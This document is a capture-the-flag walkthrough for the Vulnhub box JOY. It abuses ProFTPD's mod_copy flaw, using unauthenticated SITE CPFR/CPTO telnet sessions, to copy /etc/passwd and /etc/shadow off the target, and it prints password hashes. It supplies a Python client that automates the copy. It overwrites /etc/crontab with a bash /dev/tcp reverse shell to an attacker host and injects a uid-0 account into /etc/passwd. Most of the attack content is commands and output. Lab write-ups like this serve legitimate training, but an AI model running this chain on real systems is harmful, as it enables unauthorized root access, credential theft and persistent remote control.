-rw-r--r--  1 patrick patrick    24 Dec 23 10:45 ZF0qyYqqcMVvRzyhxB7GViMrT3IQbKUAKZIVRpKplsSsKFwiStFo1XJZurxwhDbV.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:25 zWGDtSIjrbIWxpAhoLVeuUKcWutMBhBjVfvb6cqMTUMpe2s4wHPq65F2uzV7tMyL.txt

You should know where the directory can be accessed.

Information of this Machine!

Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux


Setting aside the randomly named .txt files, the listing shows a version_control file in patrick's home that is worth reading. The directory file itself ends with:

You should know where the directory can be accessed.

Information of this Machine!


The hint says we need to copy something to a known location, and ProFTPD has exactly that flaw: mod_copy in ProFTPD 1.3.5 (CVE-2015-3306) lets an unauthenticated client issue SITE CPFR (copy from) and SITE CPTO (copy to), copying any file the daemon can read to any path it can write, with no login at all. The banner nmap saw says 1.2.10, but the version_control file (quoted in the addendum below) says ProFTPd 1.3.5; ProFTPD's banner is just a configurable string, so the file is the one to trust.

FTP file copy vulnerability (ProFTPD mod_copy)
┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.143 21
Trying 192.168.12.143...
Connected to 192.168.12.143.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto /home/ftp/pass
250 Copy successful

The server reports the copy succeeded!

Explanation:

SITE CPFR names the source (/etc/passwd); the 350 reply means the server found it and is waiting for a destination. SITE CPTO names the destination (/home/ftp/pass); the 250 "Copy successful" reply confirms the write. Both commands were accepted straight after the 220 banner, before any USER/PASS, which is the bug. /home/ftp is the anonymous FTP root, so the copy can now be downloaded.
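What the telnet session above does by hand is the whole exploit. As an added example that is not part of the original write-up and not ProFTPD's code, here is a small client that drives SITE CPFR/CPTO over the FTP control channel and checks the 350 and 250 reply codes, together with a constructed fake server that answers the way JOY did, so the exchange can be run offline (point the client at 192.168.12.143:21 to reproduce the box). It assumes the server accepts SITE before any USER/PASS, which is what makes CVE-2015-3306 exploitable anonymously.

```python
import socket
import socketserver
import threading


def parse_reply(line: str) -> tuple[int, str]:
    """Split an FTP reply line such as "250 Copy successful" into (code, text)."""
    code, _, text = line.strip().partition(" ")
    if len(code) != 3 or not code.isdigit():
        raise ValueError(f"malformed FTP reply: {line!r}")
    return int(code), text


class ModCopyClient:
    """Drives ProFTPD mod_copy's SITE CPFR / SITE CPTO over the FTP control channel."""

    def __init__(self, host: str, port: int = 21, timeout: float = 5.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.rfile = self.sock.makefile("r", encoding="latin-1", newline="\r\n")
        self.banner = self._read_reply()  # (220, "The Good Tech Inc. FTP Server") on JOY

    def _read_reply(self) -> tuple[int, str]:
        # Multi-line replies use "NNN-text" continuation lines; the final line is "NNN text".
        while True:
            line = self.rfile.readline()
            if not line:
                raise ConnectionError("server closed the control connection")
            if len(line) >= 4 and line[:3].isdigit() and line[3] == " ":
                return parse_reply(line)

    def _cmd(self, command: str) -> tuple[int, str]:
        self.sock.sendall((command + "\r\n").encode("latin-1"))
        return self._read_reply()

    def copy(self, src: str, dst: str) -> tuple[bool, str]:
        """Copy src to dst server-side. 350 acknowledges the source, 250 the finished copy."""
        code, text = self._cmd(f"SITE CPFR {src}")
        if code != 350:
            return False, f"CPFR {src}: {code} {text}"
        code, text = self._cmd(f"SITE CPTO {dst}")
        if code != 250:
            return False, f"CPTO {dst}: {code} {text}"
        return True, f"{src} -> {dst}"

    def close(self) -> None:
        try:
            self._cmd("QUIT")
        finally:
            self.sock.close()


class FakeModCopyHandler(socketserver.StreamRequestHandler):
    """Constructed stand-in that replies like JOY's ProFTPD did; it is not ProFTPD."""

    def handle(self):
        self.wfile.write(b"220 The Good Tech Inc. FTP Server\r\n")
        pending = None  # source path from the last CPFR
        for raw in self.rfile:
            verb, _, arg = raw.decode("latin-1").strip().partition(" ")
            sub, _, path = arg.partition(" ")
            if verb.upper() == "QUIT":
                self.wfile.write(b"221 Goodbye.\r\n")
                return
            if verb.upper() == "SITE" and sub.upper() == "CPFR" and path:
                pending = path
                reply = b"350 File or directory exists, ready for destination name\r\n"
            elif verb.upper() == "SITE" and sub.upper() == "CPTO" and pending and path:
                pending = None
                reply = b"250 Copy successful\r\n"
            else:
                reply = b"500 Command not understood\r\n"  # any other code: no copy happened
            self.wfile.write(reply)


def start_fake_server() -> socketserver.ThreadingTCPServer:
    """Start the fake on 127.0.0.1 with an ephemeral port; read it from server_address."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeModCopyHandler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def copy_file(host: str, port: int, src: str, dst: str) -> tuple[bool, str]:
    """One-shot helper: connect, copy, quit."""
    client = ModCopyClient(host, port)
    try:
        return client.copy(src, dst)
    finally:
        client.close()


if __name__ == "__main__":
    srv = start_fake_server()  # use ("192.168.12.143", 21) instead to run against the box
    print(copy_file("127.0.0.1", srv.server_address[1], "/etc/passwd", "/home/ftp/pass"))
    srv.shutdown()
```

The client deliberately stops at the first reply code that is not 350/250 instead of assuming success, because the same two commands on a server without mod_copy (or a patched one that requires a login) come back with an error and nothing is written.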


┌──(root㉿ru)-[~/kali]
└─# ftp 192.168.12.143
Connected to 192.168.12.143.
220 The Good Tech Inc. FTP Server
Name (192.168.12.143:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||13040|)
150 Opening ASCII mode data connection for file list
drwxr-x---   4 ftp      ftp          4096 Dec 23 05:37 .
drwxr-x---   4 ftp      ftp          4096 Dec 23 05:37 ..
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 04:56 download
-rw-r--r--   1 0        0            2556 Dec 23 05:37 pass
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 05:02 upload
226 Transfer complete

And there it is. Note the owner: uid 0, so the copy was made as root.

┌──(root㉿ru)-[~/kali]
└─# cat pass | grep "/home" | grep -v "nologin"
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
ntp:x:121:126::/home/ntp:/bin/false
ftp:x:1001:1001::/home/ftp:/bin/false


Now try /etc/shadow, which only root can read:

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.143 21
Trying 192.168.12.143...
Connected to 192.168.12.143.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /etc/shadow
350 File or directory exists, ready for destination name
site cpto /home/ftp/shadow
250 Copy successful


Success! Pull it down over the anonymous session:

ftp> ls
229 Entering Extended Passive Mode (|||9290|)
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 04:56 download
-rw-r--r--   1 0        0            2556 Dec 23 05:37 pass
-rw-r--r--   1 0        0            1631 Dec 23 05:42 shadow
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 05:02 upload
226 Transfer complete
ftp> get shadow
local: shadow remote: shadow
229 Entering Extended Passive Mode (|||47226|)
150 Opening BINARY mode data connection for shadow (1631 bytes)
100% |*************************|  1631       16.54 MiB/s    00:00 ETA
226 Transfer complete
1631 bytes received in 00:00 (1.69 MiB/s)
ftp>


┌──(root㉿ru)-[~/kali]
└─# cat shadow
root:$6$1xFSccJ0$o0y1Y1wScZ7FSYrsqhwPSYlm58gMeXNI1w336fcuD1qhaJzpKpEFX2BF6KI2Ue.8LGg0ELoPzfMcAjCDyt7pO1:17888:0:99999:7:::

patrick:$6$gp70WRqc$Lx5OEcBPnCh.ADYE7BUvxd0vzQGgDwI6AYMmtkHdJ..5NcbwYgb04DJUx2rmyc6mjxW0We5nDCveoEWnoKAB.0:17888:0:99999:7:::

ftp:$6$tbnbaqvF$gXhtn5Yw9zruUoNwqweryiNV7G/ix1kwvYZ.BPANhndyBXTa5/oMx9UW6XZ6mQMaviuaIfU0/r.abgjBGL2z90:17902:0:99999:7:::

......

Since /etc/shadow (readable only by root) could be copied and every copy is owned by uid 0, ProFTPD is running as root. That gives two routes: copy /etc/crontab out, add a reverse-shell job, upload the edited file and copy it back over /etc/crontab; or crack the three sha512crypt ($6$) hashes offline with john or hashcat and log in as that user. We take the crontab route.

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.143 21
Trying 192.168.12.143...
Connected to 192.168.12.143.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /etc/crontab
350 File or directory exists, ready for destination name
site cpto /home/ftp/crontab
250 Copy successful

┌──(root㉿ru)-[~/kali]
└─# ftp 192.168.12.143
Connected to 192.168.12.143.
220 The Good Tech Inc. FTP Server
Name (192.168.12.143:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Type set to I
ftp> ls
229 Entering Extended Passive Mode (|||51984|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 0        0             722 Dec 23 06:03 crontab
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 04:56 download
-rw-r--r--   1 0        0            2556 Dec 23 05:37 pass
-rw-r--r--   1 0        0            1631 Dec 23 05:42 shadow
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 05:02 upload
226 Transfer complete
ftp> get crontab
local: crontab remote: crontab
229 Entering Extended Passive Mode (|||38333|)
150 Opening BINARY mode data connection for crontab (722 bytes)
100% |*************************|   722        3.86 MiB/s    00:00 ETA
226 Transfer complete
722 bytes received in 00:00 (696.02 KiB/s)

Edit the downloaded crontab so it reads as follows; the */1 line is our addition and runs every minute as root:

┌──(root㉿ru)-[~/kali]
└─# cat crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/1  *  * * *   root    /bin/bash -c 'bash -i >& /dev/tcp/192.168.12.128/1234 0>&1'
#


ftp> put crontab shell
local: crontab remote: shell
229 Entering Extended Passive Mode (|||34276|)
150 Opening BINARY mode data connection for shell
100% |******************************************************************************************************************************************************|   806        3.76 MiB/s    00:00 ETA
226 Transfer complete
806 bytes sent in 00:00 (1.09 MiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||12672|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 0        0             722 Dec 23 06:03 crontab
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 04:56 download
-rw-r--r--   1 0        0            2556 Dec 23 05:37 pass
-rw-r--r--   1 0        0            1631 Dec 23 05:42 shadow
-rw-r--r--   1 ftp      ftp           806 Dec 23 06:10 shell
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 05:02 upload
226 Transfer complete

The modified crontab is uploaded under the name shell (anonymous can write into the FTP root). Now copy it over /etc/crontab:

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.143 21
Trying 192.168.12.143...
Connected to 192.168.12.143.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/shell
350 File or directory exists, ready for destination name
site cpto /etc/crontab
250 Copy successful

Then wait a minute for cron to run the new job.

Addendum
Let's also look at the version_control file:

-rw-r--r--  1 patrick patrick   407 Jan 27  2019 version_control

It belongs to patrick and sits in his home directory, so copy it into the FTP root the same way:

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.143 21
Trying 192.168.12.143...
Connected to 192.168.12.143.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/version_control
350 File or directory exists, ready for destination name
site cpto /home/ftp/version_control
250 Copy successful



┌──(root㉿ru)-[~/kali]
└─# cat version_control
Version Control of External-Facing Services:

Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.


This gives us the real webroot, /var/www/tryingharderisjoy, plus the service versions. ProFTPd 1.3.5 is the mod_copy version (the 1.2.10 banner was misleading), and Dropbear 0.34 is very old.


Browsing to that directory gives the site's home page.

openssl

┌──(root㉿ru)-[~/kali]
└─# openssl passwd -1 -salt woll woll > woll.hash

┌──(root㉿ru)-[~/kali]
└─# cat woll.hash
$1$woll$9u5r6d8vYJoi9rDpwBnEK1

Append the following entry to pass, the /etc/passwd we copied off the box earlier, and save the result as pass1. A passwd line has seven colon-separated fields (name, password, uid, gid, gecos, home, shell); with the hash in the password field instead of "x", /etc/shadow is never consulted, and uid 0 makes the account root:

woll:$1$woll$9u5r6d8vYJoi9rDpwBnEK1:0:0:root:/root:/bin/bash

openssl passwd -1 produces an MD5-crypt ($1$) hash; -6 would give sha512crypt like the box's own entries, and glibc accepts either. Then upload pass1:

ftp> put pass1 password
local: pass1 remote: password
229 Entering Extended Passive Mode (|||35946|)
150 Opening BINARY mode data connection for password
100% |******************************************************************************************************************************************************|  2611       46.98 MiB/s    00:00 ETA
226 Transfer complete
2611 bytes sent in 00:00 (3.35 MiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||16363|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 0        0             722 Dec 23 06:03 crontab
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 04:56 download
-rw-r--r--   1 0        0            2556 Dec 23 05:37 pass
-rw-r--r--   1 ftp      ftp          2611 Dec 23 06:38 password
-rw-r--r--   1 0        0            1631 Dec 23 05:42 shadow
-rw-r--r--   1 ftp      ftp           806 Dec 23 06:10 shell
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 05:02 upload
-rw-r--r--   1 0        0             407 Dec 23 06:22 version_control
226 Transfer complete

It is uploaded as password. Now copy it over /etc/passwd:

┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.143 21
Trying 192.168.12.143...
Connected to 192.168.12.143.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/password
350 File or directory exists, ready for destination name
site cpto /etc/passwd
250 Copy successful 


Done!

Note: because of the target itself we could not log in over SSH; presumably the SSH server version is too old. Adding a series of client options still didn't get us in.

get root

┌──(root㉿ru)-[~/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.12.143: inverse host lookup failed: Unknown host
connect to [192.168.12.128] from (UNKNOWN) [192.168.12.143] 37682
bash: cannot set terminal process group (7811): Inappropriate ioctl for device
bash: no job control in this shell
root@JOY:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@JOY:~# cd /root
cd /root
root@JOY:~# ls
ls
author-secret.txt
document-generator.sh
dovecot.crt
dovecot.csr
dovecot.key
permissions.sh
proof.txt
rootCA.key
rootCA.pem
rootCA.srl
root@JOY:~# cat author-secret.txt
cat author-secret.txt
Thanks for joining us!

If you have not rooted MERCY, DEVELOPMENT, BRAVERY, TORMENT, please root them too!

This will conclude the series of five boxes on Vulnhub for pentesting practice, and once again, these were built while thinking about OffSec in mind. :-)

For those who have helped made videos on rooting these boxes, I am more than grateful for your support. This means a lot for the box creator and those who have helped test these boxes. A shoutout to the kind folk from Wizard Labs, Zajt, as well as friends in the local security community which I belong to.

If you found the boxes a good learning experience, feel free to share them with your friends.

As of the time of writing, I will be working on (building) some boxes on Wizard-Labs, in a similar flavour to these boxes. If you enjoyed these, consider pinging them and their project. I think their lab is slowly being built into a nice lab with a variety of machines with good learning value.

I was rather glad someone found me on Linkedin after breaking into these boxes. If you would like to contact the author, you can find some of the author's contact points on his website (https://donavan.sg).

May the r00t be with you.

P.S. Someone asked me, also, about "shesmileslikeabrightsmiley". Yes, indeed, she smiles like a bright smiley. She makes me smile like a bright smiley too? :-)
root@JOY:~# cat proof.txt
cat proof.txt
Never grant sudo permissions on scripts that perform system functions!
root@JOY:~#

Summary

There is more than one way to escalate privileges here. Since version_control gave us the webroot, we could instead use mod_copy to write a webshell under /var/www/tryingharderisjoy, catch a low-privilege reverse shell from it, and then switch to the uid-0 account we added to /etc/passwd to become root.

